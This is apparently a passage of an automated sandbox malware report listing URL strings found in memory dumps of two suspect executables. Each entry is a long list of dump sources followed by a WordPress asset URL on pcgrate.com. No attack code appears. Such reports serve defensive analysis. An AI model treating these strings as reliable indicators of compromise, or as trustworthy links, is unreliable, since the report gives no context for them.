                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/style.css?ve
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors-styl
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/css/compatibility/elementor/elementor-global.min.cs
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/css/main.min.css?ver=9.12.0
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/fonts/FontAwesome/css/all.min.css?ver=9.12.0
                  Source: pigalicapi.exe, 00000003.00000003.669232158.0000000004E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/fonts/icomoon-the7-font/icomoon-the7-font.min.css?v
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/js/above-the-fold.min.js?ver=9.12.0
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/js/compatibility/woocommerce/woocommerce.min.js?ver
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/js/main.min.js?ver=9.12.0
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/lib/custom-scrollbar/custom-scrollbar.min.css?ver=9
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/lib/custom-scrollbar/custom-scrollbar.min.js?ver=9.
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/lib/jquery-mousewheel/jquery-mousewheel.min.js?ver=
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/style.css?ver=9.12.0
